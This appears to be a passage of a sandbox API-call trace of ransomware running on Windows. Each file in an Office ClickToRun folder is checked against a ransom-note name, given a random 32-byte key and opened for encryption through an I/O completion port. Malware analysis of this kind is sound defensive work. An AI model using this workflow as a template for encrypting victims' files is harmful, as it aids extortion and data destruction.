CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.144] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.147] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77eb22d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.officemui.msi.16.en-us.xml", cAlternateFileName="C29059~1.XML")) returned 1 [0156.147] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned 117 [0156.147] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.147] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0156.147] lstrlenW (lpString=".xml") returned 4 [0156.147] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0156.156] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.156] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.158] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=106882) returned 1 [0156.158] GetProcessHeap () returned 0x270000 [0156.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.158] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1F") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2E") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F1") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="37") returned 2 [0156.158] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="09") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D5") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="5A") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="92") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C0") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D9") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="97") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C1") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="88") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="91") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="93") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="6D") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="17") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="02") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="76") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="93") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C7") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="34") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3B") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9F") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="2D") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="06") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D3") returned 2 [0156.159] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="03") returned 2 [0156.160] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" [0156.160] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77ed8430, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml", cAlternateFileName="C2467F~1.XML")) returned 1 [0156.172] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned 120 [0156.172] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.172] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0156.172] lstrlenW (lpString=".xml") returned 4 [0156.172] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0156.172] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.173] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0156.173] GetProcessHeap () returned 0x270000 [0156.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.174] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="82") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="81") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="29") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="4C") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5F") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1B") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="89") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E3") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B7") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B7") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="13") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="63") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="3C") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E8") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FE") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EE") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="45") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FC") returned 2 [0156.174] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="CF") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DC") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="81") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A6") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="52") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DC") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2D") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CB") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7D") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C8") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4F") returned 2 [0156.175] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0156.175] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" [0156.175] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.175] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77683730, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cAlternateFileName="C21839~1.XML")) returned 1 [0156.176] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned 131 [0156.176] lstrcmpW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.177] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0156.177] lstrlenW (lpString=".xml") returned 4 [0156.177] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0156.177] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.188] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=95944) returned 1 [0156.188] GetProcessHeap () returned 0x270000 [0156.188] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.192] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F5") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="29") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="78") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4F") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="8D") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="60") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="28") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="81") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="38") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BD") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AA") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="32") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="78") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="8A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CE") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B6") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4A") returned 2 [0156.192] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="81") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="52") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A1") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E6") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5F") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BA") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="65") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AA") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FC") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1F") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BB") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="9C") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="98") returned 2 [0156.193] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2D") returned 2 [0156.193] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" [0156.193] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.194] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.194] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dfd4f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dfd4f0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77df3bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml", cAlternateFileName="C24C3D~1.XML")) returned 1 [0156.194] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned 118 [0156.194] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.194] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0156.194] lstrlenW (lpString=".xml") returned 4 [0156.194] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0156.194] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.194] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.194] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18970) returned 1 [0156.194] GetProcessHeap () returned 0x270000 [0156.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.198] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="16") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="93") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D1") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="72") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FB") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C5") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F1") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="46") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="78") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5C") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="98") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8C") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="65") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="60") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B0") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="FC") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D4") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A0") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="17") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7C") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="54") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="82") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CC") returned 2 [0156.198] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E4") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="43") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A6") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="46") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="09") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0E") returned 2 [0156.199] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0B") returned 2 [0156.199] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" [0156.199] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.199] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.199] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7759eef0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cAlternateFileName="C24EFF~1.XML")) returned 1 [0156.199] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned 123 [0156.200] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.200] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" [0156.200] lstrlenW (lpString=".xml") returned 4 [0156.200] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" [0156.200] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0156.201] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1518) returned 1 [0156.201] GetProcessHeap () returned 0x270000 [0156.201] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.204] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="56") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3A") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CA") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="39") returned 2 [0156.204] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="ED") returned 2 [0156.204] wsprintfW 